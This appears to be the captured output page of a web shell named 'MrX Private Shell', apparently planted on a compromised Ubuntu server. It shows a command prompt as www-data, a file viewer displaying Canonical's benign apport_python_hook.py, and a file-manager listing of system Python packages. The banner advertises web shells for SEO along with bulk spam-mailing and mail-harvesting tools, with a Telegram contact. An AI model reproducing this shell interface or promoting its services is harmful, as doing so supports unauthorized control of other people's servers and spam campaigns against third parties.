__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
"""Python sys.excepthook hook to generate apport crash dumps."""

# Copyright (c) 2006 - 2009 Canonical Ltd.
# Authors: Robert Collins <robert@ubuntu.com>
#          Martin Pitt <martin.pitt@ubuntu.com>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.  See http://www.gnu.org/copyleft/gpl.html for
# the full text of the license.

import sys

CONFIG = "/etc/default/apport"


def enabled():
    """Return whether Apport should generate crash reports."""
    # This doesn't use apport.packaging.enabled() because it is too heavyweight
    # See LP: #528355
    try:
        # pylint: disable=import-outside-toplevel; for Python startup time
        import re

        with open(CONFIG, encoding="utf-8") as config_file:
            conf = config_file.read()
        return re.search(r"^\s*enabled\s*=\s*0\s*$", conf, re.M) is None
    except OSError:
        # if the file does not exist, assume it's enabled
        return True


def apport_excepthook(binary, exc_type, exc_obj, exc_tb):
    # TODO: Split into smaller functions/methods
    # pylint: disable=too-many-branches,too-many-locals
    # pylint: disable=too-many-return-statements,too-many-statements
    """Catch an uncaught exception and make a traceback."""
    # create and save a problem report. Note that exceptions in this code
    # are bad, and we probably need a per-thread reentrancy guard to
    # prevent that happening. However, on Ubuntu there should never be
    # a reason for an exception here, other than [say] a read only var
    # or some such. So what we do is use a try - finally to ensure that
    # the original excepthook is invoked, and until we get bug reports
    # ignore the other issues.

    # import locally here so that there is no routine overhead on python
    # startup time - only when a traceback occurs will this trigger.
    # pylint: disable=import-outside-toplevel
    try:
        # ignore 'safe' exit types.
        if exc_type in (KeyboardInterrupt,):
            return

        # do not do anything if apport was disabled
        if not enabled():
            return

        try:
            import contextlib
            import io
            import os
            import re
            import traceback

            import apport.report
            from apport.fileutils import (
                increment_crash_counter,
                likely_packaged,
                should_skip_crash,
            )
        except (ImportError, OSError):
            return

        # for interactive Python sessions, sys.argv[0] == ""
        if not binary:
            return

        binary = os.path.realpath(binary)

        # filter out binaries in user accessible paths
        if not likely_packaged(binary):
            return

        report = apport.report.Report()

        # special handling of dbus-python exceptions
        if hasattr(exc_obj, "get_dbus_name"):
            name = exc_obj.get_dbus_name()
            if name == "org.freedesktop.DBus.Error.NoReply":
                # NoReply is an useless crash, we do not even get the method it
                # was trying to call; needs actual crash from D-BUS backend
                # (LP #914220)
                return
            if name == "org.freedesktop.DBus.Error.ServiceUnknown":
                dbus_service_unknown_analysis(exc_obj, report)
            else:
                report["_PythonExceptionQualifier"] = name

        # disambiguate OSErrors with errno:
        if exc_type == OSError and exc_obj.errno is not None:
            report["_PythonExceptionQualifier"] = str(exc_obj.errno)

        # append a basic traceback. In future we may want to include
        # additional data such as the local variables, loaded modules etc.
        tb_file = io.StringIO()
        traceback.print_exception(exc_type, exc_obj, exc_tb, file=tb_file)
        report["Traceback"] = tb_file.getvalue().strip()
        report.add_proc_info(extraenv=["PYTHONPATH", "PYTHONHOME"])
        report.add_user_info()
        # override the ExecutablePath with the script that was actually running
        report["ExecutablePath"] = binary
        if "ExecutableTimestamp" in report:
            report["ExecutableTimestamp"] = str(int(os.stat(binary).st_mtime))
        try:
            report["PythonArgs"] = f"{sys.argv!r}"
        except AttributeError:
            pass
        if report.check_ignored():
            return

        with contextlib.suppress(SystemError, ValueError):
            report.add_package_info()
        report["_HooksRun"] = "no"

        report_dir = os.environ.get("APPORT_REPORT_DIR", "/var/crash")
        try:
            os.makedirs(report_dir, mode=0o3777, exist_ok=True)
        except OSError:
            return

        mangled_program = re.sub("/", "_", binary)
        # get the uid for now, user name later
        pr_filename = f"{report_dir}/{mangled_program}.{os.getuid()}.crash"
        if os.path.exists(pr_filename):
            increment_crash_counter(report, pr_filename)
            if should_skip_crash(report, pr_filename):
                return
            # remove the old file, so that we can create the new one with
            # os.O_CREAT|os.O_EXCL
            os.unlink(pr_filename)

        with os.fdopen(
            os.open(pr_filename, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640), "wb"
        ) as report_file:
            report.write(report_file)

    finally:
        # resume original processing to get the default behaviour,
        # but do not trigger an AttributeError on interpreter shutdown.
        if sys:  # pylint: disable=using-constant-test
            sys.__excepthook__(exc_type, exc_obj, exc_tb)


def dbus_service_unknown_analysis(exc_obj, report):
    """Analyze D-Bus service error and add analysis to report."""
    # TODO: Split into smaller functions/methods
    # pylint: disable=too-many-locals
    # pylint: disable=import-outside-toplevel; for Python startup time
    import re
    import subprocess
    from configparser import ConfigParser, NoOptionError, NoSectionError
    from glob import glob

    # determine D-BUS name
    match = re.search(
        r"name\s+(\S+)\s+was not provided by any .service", exc_obj.get_dbus_message()
    )
    if not match:
        if sys.stderr:
            sys.stderr.write(
                "Error: cannot parse D-BUS name from exception: "
                + exc_obj.get_dbus_message()
            )
            return

    dbus_name = match.group(1)

    # determine .service file and Exec name for the D-BUS name
    services = []  # tuples of (service file, exe name, running)
    for service_file in glob("/usr/share/dbus-1/*services/*.service"):
        service = ConfigParser(interpolation=None)
        service.read(service_file, encoding="UTF-8")
        try:
            if service.get("D-BUS Service", "Name") == dbus_name:
                exe = service.get("D-BUS Service", "Exec")
                running = (
                    subprocess.call(["pidof", "-sx", exe], stdout=subprocess.PIPE) == 0
                )
                services.append((service_file, exe, running))
        except (NoSectionError, NoOptionError):
            if sys.stderr:
                sys.stderr.write(
                    f"Invalid D-BUS .service file {service_file}:"
                    f" {exc_obj.get_dbus_message()}"
                )
            continue

    if not services:
        report["DbusErrorAnalysis"] = f"no service file providing {dbus_name}"
    else:
        report["DbusErrorAnalysis"] = "provided by"
        for service, exe, running in services:
            report[
                "DbusErrorAnalysis"
            ] += f" {service} ({exe} is {'' if running else 'not '}running)"


def install():
    """Install the python apport hook."""
    # Record before the program can mutate sys.argv and can call os.chdir().
    binary = sys.argv[0]
    if binary and not binary.startswith("/"):
        # pylint: disable=import-outside-toplevel; for Python startup time
        import os

        try:
            binary = f"{os.getcwd()}/{binary}"
        except FileNotFoundError:
            try:
                binary = os.readlink("/proc/self/cwd")
                if binary.endswith(" (deleted)"):
                    binary = binary[:-10]
            except OSError:
                return

    def partial_apport_excepthook(exc_type, exc_obj, exc_tb):
        return apport_excepthook(binary, exc_type, exc_obj, exc_tb)

    sys.excepthook = partial_apport_excepthook

Filemanager

Name Type Size Permission Actions
Automat-22.10.0.egg-info Folder 0755
CommandNotFound Folder 0755
ConfigArgParse-1.7.egg-info Folder 0755
DistUpgrade Folder 0755
HweSupportStatus Folder 0755
NvidiaDetector Folder 0755
OpenSSL Folder 0755
PyICU-2.12.egg-info Folder 0755
PyJWT-2.7.0.dist-info Folder 0755
PyYAML-6.0.1.dist-info Folder 0755
Quirks Folder 0755
UbuntuDrivers Folder 0755
UpdateManager Folder 0755
__pycache__ Folder 0755
_distutils_hack Folder 0755
_yaml Folder 0755
acme Folder 0755
acme-2.9.0.egg-info Folder 0755
apport Folder 0755
apt Folder 0755
apt_inst-stubs Folder 0755
apt_pkg-stubs Folder 0755
aptsources Folder 0755
asyncore Folder 0755
attr Folder 0755
attrs Folder 0755
attrs-23.2.0.dist-info Folder 0755
automat Folder 0755
bcc Folder 0755
bcc-0.29.1.egg-info Folder 0755
bcrypt Folder 0755
bcrypt-3.2.2.egg-info Folder 0755
blinker Folder 0755
blinker-1.7.0.dist-info Folder 0755
boto3 Folder 0755
boto3-1.34.46.egg-info Folder 0755
botocore Folder 0755
botocore-1.34.46.egg-info Folder 0755
certbot Folder 0755
certbot-2.9.0.egg-info Folder 0755
certbot_apache Folder 0755
certbot_apache-2.9.0.egg-info Folder 0755
certifi Folder 0755
certifi-2023.11.17.egg-info Folder 0755
chardet Folder 0755
chardet-5.2.0.dist-info Folder 0755
click Folder 0755
click-8.1.6.egg-info Folder 0755
colorama Folder 0755
colorama-0.4.6.dist-info Folder 0755
configobj Folder 0755
configobj-5.0.8.dist-info Folder 0755
constantly Folder 0755
constantly-23.10.4.egg-info Folder 0755
cryptography Folder 0755
cryptography-41.0.7.dist-info Folder 0755
cryptography.egg-info Folder 0755
dateutil Folder 0755
dbus Folder 0755
dbus_python-1.3.2.egg-info Folder 0755
debian Folder 0755
debian_bundle Folder 0755
distro Folder 0755
distro-1.9.0.dist-info Folder 0755
distro_info Folder 0755
distro_info-1.7+build1.egg-info Folder 0755
fail2ban Folder 0755
fail2ban-1.0.2.egg-info Folder 0755
gi Folder 0755
hamcrest Folder 0755
httplib2 Folder 0755
httplib2-0.20.4.dist-info Folder 0755
hyperlink Folder 0755
hyperlink-21.0.0.egg-info Folder 0755
icu Folder 0755
idna Folder 0755
idna-3.6.dist-info Folder 0755
incremental Folder 0755
incremental-22.10.0.dist-info Folder 0755
janitor Folder 0755
jmespath Folder 0755
jmespath-1.0.1.egg-info Folder 0755
josepy Folder 0755
josepy-1.14.0.dist-info Folder 0755
jwt Folder 0755
landscape Folder 0755
launchpadlib Folder 0755
launchpadlib-1.11.0.egg-info Folder 0755
lazr Folder 0755
lazr.restfulclient-0.14.6.egg-info Folder 0755
lazr.uri-1.0.6.egg-info Folder 0755
linux-tools-6.8.0-41 Folder 0755
magic Folder 0755
markdown_it Folder 0755
markdown_it_py-3.0.0.dist-info Folder 0755
mdurl Folder 0755
mdurl-0.1.2.dist-info Folder 0755
netaddr Folder 0755
netaddr-0.8.0.egg-info Folder 0755
netifaces-0.11.0.egg-info Folder 0755
netplan Folder 0755
oauthlib Folder 0755
oauthlib-3.2.2.egg-info Folder 0755
packaging Folder 0755
packaging-24.0.dist-info Folder 0755
parsedatetime Folder 0755
parsedatetime-2.6.egg-info Folder 0755
perf Folder 0755
pexpect Folder 0755
pexpect-4.9.0.egg-info Folder 0755
pkg_resources Folder 0755
ptyprocess Folder 0755
ptyprocess-0.7.0.dist-info Folder 0755
pyOpenSSL-23.2.0.egg-info Folder 0755
pyRFC3339-1.1.egg-info Folder 0755
pyasn1 Folder 0755
pyasn1-0.4.8.egg-info Folder 0755
pyasn1_modules Folder 0755
pyasyncore-1.0.2.egg-info Folder 0755
pygments Folder 0755
pygments-2.17.2.dist-info Folder 0755
pygtkcompat Folder 0755
pyhamcrest-2.1.0.dist-info Folder 0755
pyinotify-0.9.6.egg-info Folder 0755
pyparsing Folder 0755
pyparsing-3.1.1.dist-info Folder 0755
pyrfc3339 Folder 0755
pyserial-3.5.egg-info Folder 0755
python_apt-2.7.7+ubuntu5.1.egg-info Folder 0755
python_dateutil-2.8.2.egg-info Folder 0755
python_debian-0.1.49+ubuntu2.egg-info Folder 0755
python_magic-0.4.27.egg-info Folder 0755
pytz Folder 0755
pytz-2024.1.egg-info Folder 0755
requests Folder 0755
requests-2.31.0.egg-info Folder 0755
rich Folder 0755
rich-13.7.1.dist-info Folder 0755
s3transfer Folder 0755
s3transfer-0.10.1.egg-info Folder 0755
serial Folder 0755
service_identity Folder 0755
service_identity-24.1.0.dist-info Folder 0755
setuptools Folder 0755
setuptools-68.1.2.egg-info Folder 0755
six-1.16.0.egg-info Folder 0755
softwareproperties Folder 0755
sos Folder 0755
sos-4.9.2.egg-info Folder 0755
ssh_import_id Folder 0755
ssh_import_id-5.11.egg-info Folder 0755
systemd Folder 0755
systemd_python-235.egg-info Folder 0755
twisted Folder 0755
twisted-24.3.0.dist-info Folder 0755
uaclient Folder 0755
ubuntu_drivers_common-0.0.0.egg-info Folder 0755
ubuntu_pro_client-8001.egg-info Folder 0755
unattended_upgrades-0.1.egg-info Folder 0755
urllib3 Folder 0755
urllib3-2.0.7.dist-info Folder 0755
validate Folder 0755
wadllib Folder 0755
wadllib-1.3.6.egg-info Folder 0755
xkit Folder 0755
yaml Folder 0755
zope Folder 0755
zope.interface-6.1.egg-info Folder 0755
PyGObject-3.48.2.egg-info File 851 B 0644
_cffi_backend.cpython-312-x86_64-linux-gnu.so File 189.95 KB 0644
_dbus_bindings.cpython-312-x86_64-linux-gnu.so File 168.28 KB 0644
_dbus_glib_bindings.cpython-312-x86_64-linux-gnu.so File 22.5 KB 0644
_snack.cpython-312-x86_64-linux-gnu.so File 46.74 KB 0644
apport_python_hook.py File 8.49 KB 0644
apt_inst.cpython-312-x86_64-linux-gnu.so File 58.66 KB 0644
apt_pkg.cpython-312-x86_64-linux-gnu.so File 339.19 KB 0644
augeas.py File 23 KB 0644
command_not_found-0.3.egg-info File 189 B 0644
configargparse.py File 63.09 KB 0644
deb822.py File 273 B 0644
debconf.py File 7.87 KB 0644
distro_info.py File 14.26 KB 0644
distutils-precedence.pth File 151 B 0644
netifaces.cpython-312-x86_64-linux-gnu.so File 26.66 KB 0644
problem_report.py File 32.83 KB 0644
pyasn1_modules-0.2.8.egg-info File 1.79 KB 0644
pyinotify.py File 86.92 KB 0644
python_augeas-0.5.0.egg-info File 238 B 0644
six.py File 33.74 KB 0644
snack.py File 30.4 KB 0644
xkit-0.0.0.egg-info File 266 B 0644
zope.interface-6.1-nspkg.pth File 529 B 0644
Filemanager